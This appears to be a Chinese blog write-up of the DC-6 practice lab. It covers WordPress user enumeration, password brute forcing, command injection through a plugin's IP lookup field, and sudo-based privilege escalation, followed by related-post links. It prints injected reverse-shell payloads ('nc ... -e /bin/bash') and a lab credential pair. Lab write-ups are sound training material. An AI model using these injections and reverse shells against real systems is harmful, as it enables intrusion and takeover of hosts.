DC6靶场通关

原创 已于 2025-12-03 21:24:28 修改 · 182 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2025-12-03 16:32:19 首次发布

一、靶场入口情况

使用nmap扫描发现,开放了22端口和80端口,http服务使用的apache 2.4.25似乎有漏洞,但没有看到有效的payload。

访问网站,自动换成了域名http://Wordy,因此还需要再/etc/hosts添加一条i“p-域名”的对应关系。

网站是wordpress的CMS,那么直接使用wsscan扫描,能够扫描到5个用户名,没有发现任何可利用的插件和主题,通过searchspolit搜索5.7这个版本wordpress,发现其核心可能漏洞,但是需要一个shell。

二、口令爆破

得到用户名之后,下一步肯定是爆破密码,这一次无论是cewl生成的字典还是默认一些字典都失败了,不过后来看到了官方提示,官方给了口令字典。所以还能说什么呢,直接用口令爆破吧。

三、插件漏洞

使用这个mark账号登录网页后,发现这仅仅是个普通账号,也没有文件上传的位置,但是发现他有个ativity monitor的插件,然后有个lookup和转化ip地址的运维界面。那么推断,应该可以拼接一下,执行命令。果然我们直接再ip地址这个位置加上:

;nc 192.168.136.167 4444 -e /bin/bash   或者
|nc 192.168.136.167 4444 -e /bin/bash 

kali开启监听,发送命令,成功获得了www-data的权限。

一番查找后,只发现了一个graham/G507isUM1D4的用户名密码。

四、本地提权

使用这个账户密码ssh登录后,查看一下权限,发现graham恰好是devs组, 可以修改backups.sh,因此可以再脚本后面加入'/bin/bash',然后直接运行,这样就切好到了jens用户了。

继续查看jens的发现,可以nmap具备root的nopasswd权限,再网站nmap | GTFOBins查询可以知道:

这样就可以获得一个无交互的shell,获得root的shell后,输入是不会显示的,我们就直接输入python -c "import pty;pty.spawn('/bin/sh')",变成一个交互式shell,接着cat flag。

Vulhub-DC-5靶场通关攻略
qq_65852138的博客
04-14 1706
一个一个尝试访问,发现thankyou.php发现存在年份显示变化,随着我们的刷新,年份会一直变化。之后在kali中文件所在目录执行传输命令,只知道靶机的connect后面出现数字就算传输成功。包含/etc/passwd文件验证,当然可以多试几个目录,难免有被过滤的文件。编译的时候如果你的kali版本过高,那么就会使用更高级的GLIBC库进行编译。在url后面拼接file=的时候,这个年份便不再显示,至此判断存在文件上传。至于是什么上传方式,这里可以注意下之前扫描端口的时候有一个nginx的服务。
DC-3靶场通关详细步骤
2301_79931281的博客
10-06 1288
DC-3是另一个专门建立的易受攻击的实验室,旨在获得渗透测试领域的经验。与之前的DC版本一样,这个版本是为初学者设计的,尽管这一次只有一个标志,一个入口点,根本没有线索。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。对于初学者来说,谷歌可以提供很大的帮助,但你可以随时在@DCAu7上推我让你重新开始。
DC6靶场通关详细记录】
博客
12-19 2801
主机靶场DC6通关详细记录
DC-6靶场实战
qq_42754807的博客
03-26 1768
DC-6靶场实战
DC4靶场通关详细记录】
博客
12-17 1429
DC4靶场通关记录】-----扫描器AWVS的使用;命令执行漏洞的利用;hydra爆破ssh的密码;teehee提权方法
DC-1靶场通关详解
qq_30889301的博客
05-20 495
dc-1入门教程
DC2靶场通关详细记录】
博客
12-15 1508
DC2靶场通关----使用cewl工具抓取网站内容生成密码字典cewl 网址 -w pass.txt使用wpscan枚举用户和爆破用户的登陆密码wpscan --url 网址 -e u和wpscan --url 网址 -U 用户名字典 -P 密码字典rbash绕过的方法:使用vi绕过rbashvi进入vi后:shellsudo提权方法!/bin/bash。
DC-6靶机通关
qq_63831588的博客
07-29 2846
做完感觉这个靶机还是很有意思的,并且它其实不难,但是这个思路真的很有意思。首先他的关键点在于让我们通过wp插件的漏洞去拿到webshell其次就是普通用户间的博弈,以往我们都是通过账号密码看来进行切换,而这次是通过sudo普通用户来切换然后最后的提权还是用的sudo,确实也听巧妙的,这次我愿称之为将 sudo 进行到底!!!~~~~~持续更新中。
DC5靶场通关详细记录】
博客
12-18 3280
dc5靶场通关记录---文件包含漏洞,screen漏洞提权
DC靶场系列-DC1靶场-渗透测试靶场
03-09
DC1靶场通关详细记录文档记录了渗透测试者在DC1靶场中进行渗透测试的全过程,包括对目标系统的侦察、信息收集、漏洞分析、攻击方法、提升权限等关键步骤。详细记录不仅帮助测试者回顾整个渗透测试过程中的发现与决策...
靶场练习 手把手教你通关DC系列 DC1
QYbkx974的博客
07-09 1925
本次使用的kali机的IP地址为DC1的地址为靶场IP地址为: 192.168.243.134开放端口: 22/ssh 80/http 111/rpcbind框架: cms Drupal 7中间件: Apache 2.2.22语言: php 5.4.45操作系统: Debian。
DC-9 vulnhub靶场详细通关记录
weixin_62621015的博客
03-03 753
vulnhub靶场 DC-9个人通关记录 补充了很多细节和知识点,可以参考一下
冬季安全用电监测案例
最新发布
Jima_的博客
12-03 442
本文介绍了一套针对工厂宿舍用电安全的智能监测系统。系统通过安装DAM-E3501NT采集模块,实时监测各宿舍的用电参数和环境温度,并通过以太网将数据传输至主控室。系统具备高精度测量(0.2%)、过载预警、阈值自动告警等功能,当检测到异常用电(如持续1小时功率>3kW)时可自动报警。该系统采用"感知-分析-预警-控制"的闭环架构,实现从被动防范到主动监测的转变,适用于工厂、教育机构等多种场所的用电安全管理。
智能巡检系统:智能化管理的安全守护者
Guheyunyi的博客
12-03 425
传统的巡检工作主要依赖人工完成,这种方式存在着多重挑战:首先,人工巡检的效率有限,难以实现全天候、全方位的覆盖;最重要的是,在一些危险作业环境中,巡检人员的人身安全难以得到充分保障。智能巡检系统代表着安全管理的发展方向。在工业园区,系统能够对生产设备进行全方位监控,及时发现异常状况,确保生产安全。在数字化转型的浪潮中,智能巡检系统正成为越来越多企业的优先选择,帮助他们在激烈的市场竞争中赢得先机。传统的巡检方式虽然在一定程度上保障了运营安全,但随着企业规模的扩大和设备复杂度的提升,其局限性也日益凸显。
视频直播点播平台EasyDSS构建安全高效的医疗培训直播新体系
音视频流媒体技术
12-02 318
医疗培训的数字化转型不是简单的技术应用,而是医疗教育模式的深刻变革。
软件供应链安全“黑洞”:2025安全合规的制品库如何选择?
weixin_44552837的博客
12-01 379
软件供应链攻击频发,依赖组件不可控、流转管控缺失等问题凸显制品管理风险,制品库亟需安全合规的产品选择。国产制品管理平台可构建全生命周期防御体系,以可信源建设、上传即扫描、全链路追溯及信创适配筑牢防线,是企业研发制品仓库的选型优选。
5.14、AI安全运维体系:构建企业级的“安全超脑”
骥龙信息的博客
12-02 542
未来的企业安全体系将呈现三个趋势: 1. AI 驱动,而非规则驱动 2. 自动化处理,而非人工疲于响应 3. 预测性防御,而非事后补救 AI 不是为了取代安全人员,而是让安全团队具备“超能力”。
Java安全基础——JNI安全基础
a1001086的博客
11-29 597
Java通过JNI实现与C/C++的交互,可在Java中调用本地代码。具体步骤包括:1)声明native方法;2)加载动态链接库(.dll/.so);3)使用javac生成头文件;4)实现C/C++函数;5)编译生成动态库;6)在Java中调用。JNI类型对应C++类型,基本类型直接使用,引用类型为对象指针。处理字符串时需注意内存管理,使用GetStringUTFChars获取字符串指针,最后调用ReleaseStringUTFChars释放资源。该方法可扩展Java功能,但需考虑跨平台和安全问题。
SSH 深度实战:从基础到高级安全配置
1024
11-30 560
本文全面介绍了 SSH 协议的核心技术与安全实践。主要内容包括:SSH 基础连接与密钥认证管理(RSA/ECDSA/ED25519 密钥生成与分发);服务器端安全配置(端口更改、root 登录禁用、Fail2Ban 防护);高级功能如端口转发(本地/远程/SOCKS 代理)、连接复用和代理转发;以及安全的文件传输方法(SCP/SFTP)。
DC9渗透测试靶场指南与练习
DC靶场系列是针对信息安全专业人员和渗透测试爱好者设计的一套虚拟环境,用于模拟真实的网络攻击场景,以便参与者能在合法和受控的环境中进行安全测试和技能提升。DC9靶场作为其中的一个独立模块,专注于提供具体的...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值